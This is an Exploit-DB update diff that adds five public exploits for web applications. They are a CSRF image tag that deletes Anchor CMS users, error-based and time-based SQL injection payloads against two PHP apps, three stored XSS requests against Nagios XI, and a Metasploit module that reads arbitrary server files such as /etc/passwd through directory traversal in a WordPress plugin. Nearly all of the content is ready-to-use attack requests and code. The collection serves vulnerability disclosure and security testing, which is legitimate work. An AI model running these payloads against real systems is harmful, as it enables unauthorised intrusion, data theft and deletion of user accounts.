DB: 2021-01-22

5 changes to exploits/shellcodes

Online Documents Sharing Platform 1.0 - 'user' SQL Injection
Apartment Visitors Management System 1.0 - 'email' SQL Injection
Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)
Anchor CMS 0.12.7 - CSRF (Delete user)

exploits/multiple/webapps/49451.html

@@ -0,0 +1,19 @@
+# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
+# Exploit Author: Ninad Mishra
+# Vendor Homepage: https://anchorcms.com/
+# Software Link: https://anchorcms.com/download
+# Version: 0.12.7
+# CVE : CVE-2020-23342
+
+
+###PoC
+the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html
+
+================================ 
+<img src="http://target/anchor/index.php/admin/users/delete/21">
+================================ 
+Where (21) is the user id .
+
+When admin clicks on exploit.html link
+
+User with id 21 will be deleted

exploits/php/webapps/49447.txt

@@ -0,0 +1,50 @@
+# Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection
+# Date: 21.01.2021
+# Exploit Author: CANKAT ÇAKMAK
+# Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/notes.zip
+# Version: V1.0
+# Tested on: Windows 10
+
+#Description: The 'user' parameterer is vulnerable to error-based and time-based SQL Injection.
+
+----------------------------------------------------
+
+POST /path/login.php HTTP/1.1
+Host: test.com
+Content-Length: 29
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://test.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://test.com/path/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+user=%27&pass=%27&login=login
+
+----------------------------------------------------
+
+#PoC:
+
+Parameter: user (POST)
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+    Payload: user=' AND (SELECT 2047 FROM(SELECT
+COUNT(*),CONCAT(0x7176706a71,(SELECT
+(ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)--
+HnhM&pass='&login=login

exploits/php/webapps/49448.txt

@@ -0,0 +1,42 @@
+# Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection
+# Date: 20.01.2021
+# Exploit Author: CANKAT ÇAKMAK
+# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
+# Version: V1.0
+# Tested on: Windows 10
+
+----------------------------------------------------
+
+POST /avms/forgot-password.php HTTP/1.1
+Host: test.com
+Content-Length: 42
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: test.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88
+Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://test.com/avms/forgot-password.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+
+email=test%40gmail.com&contactno=1&submit=
+
+----------------------------------------------------
+
+poC:
+
+
+Parameter: email (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: email=test@gmail.com' AND (SELECT 2600 FROM
+(SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=

exploits/php/webapps/49449.txt

@@ -0,0 +1,87 @@
+# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
+# Date: 1-20-2021
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
+# Software Link: https://www.nagios.com/downloads/nagios-xi/
+# Version: Nagios XI 5.7.5
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
+# Vulnerable Parameter : url
+
+
+# POC
+# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.
+
+POST /nagiosxi/tools/mytools.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 145
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
+Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
+Upgrade-Insecure-Requests: 1
+
+nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.
+# Vulnerable Parameter : groupID
+
+
+# POC
+# Exploit Details : The following request will create a BPI group with an XSS payload.  Click on the Group ID for the malicious BPI group to trigger the payload.
+
+POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 186
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
+Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
+Upgrade-Insecure-Requests: 1
+
+groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI.
+# Vulnerable Parameter : url
+
+
+# POC
+# Exploit Details : The following request will create a view with an XSS payload.  Click on the malicious view to trigger the payload.
+
+POST /nagiosxi/ajaxhelper.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 147
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/account/
+Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
+
+cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056

exploits/php/webapps/49450.rb

@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+    include Msf::Auxiliary::Report
+    include Msf::Exploit::Remote::HTTP::Wordpress
+    include Msf::Auxiliary::Scanner
+
+      def initialize(info = {})
+          super(update_info(info,
+            'Name'           => 'Simple JobBoard Authenticated File Read Vulnerability',
+            'Description'    => %q{
+                This module exploits an authenticated directory traversal vulnerability in WordPress plugin 'Simple JobBoard ' < 2.9.3,
+                allowing arbitrary file read with the web server privileges.
+            },
+            'Author'         =>
+              [
+                'Arcangelo Saracino', # Vulnerability discovery
+                'Hoa Nguyen - Suncsr Team',    # Metasploit module
+              ],
+            'License'        => MSF_LICENSE,
+            'References'     =>
+              [
+                ['CVE', '2020-35749'],
+                ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'],
+                ['URL','https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html']
+              ],
+            'DisclosureDate' => 'Jan 15 2021'))
+
+            register_options([
+                OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']),
+                OptString.new('USERNAME',[true,'The WordPress username to authenticate with']),
+                OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']),
+                OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]),
+            ])
+            end
+
+            def username
+                datastore['USERNAME']
+            end
+
+            def password
+                datastore['PASSWORD']
+            end
+
+            def check
+                cookie = wordpress_login(username,password)
+                if cookie.nil?
+                    store_valid_credential(user: username, private: password, proof: cookie)
+                    return CheckCode::Safe
+                end
+                CheckCode::Appears
+            end
+
+            def run_host(ip)
+                cookie = wordpress_login(username, password)
+                traversal = '../' * datastore['DEPTH']
+                filename = datastore['FILEPATH']
+                filename = filename[1, filename.length] if filename =~ /^\//
+
+                res = send_request_cgi({
+                    'cookie' => cookie,
+                    'method' => 'GET',
+                    'uri' => normalize_uri(target_uri.path,'wp-admin',''),
+                    'vars_get' =>
+                    {
+                        'post' => 'application_id',
+                        'action' => 'edit',
+                        'sjb_file' => "#{traversal}#{filename}"
+                    }
+                })
+
+                fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
+                fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+                print_good('Downloading file ...')
+                print_line("\n#{res.body}\n")
+                fname = datastore['FILEPATH']
+                path = store_loot(
+                    'Simple_JobBoard.traversal',
+                    'text/plain',
+                    ip,
+                    res.body,
+                    fname
+                )
+                print_good("File save in: #{path}")
+            end
+        end

files_exploits.csv

@@ -25890,6 +25890,7 @@ id,file,description,date,author,type,platform,port
 49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple,
 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,
 49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php,
+49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php,
 49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php,
 49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple,
@@ -43644,3 +43645,7 @@ id,file,description,date,author,type,platform,port
 49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware,
 49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,
 49438,exploits/hardware/webapps/49438.py,"Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)",2021-01-18,"Henrik Pedersen",webapps,hardware,
+49448,exploits/php/webapps/49448.txt,"Apartment Visitors Management System 1.0 - 'email' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
+49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",2021-01-21,"Matthew Aberegg",webapps,php,
+49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",2021-01-21,"SunCSR Team",webapps,php,
+49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,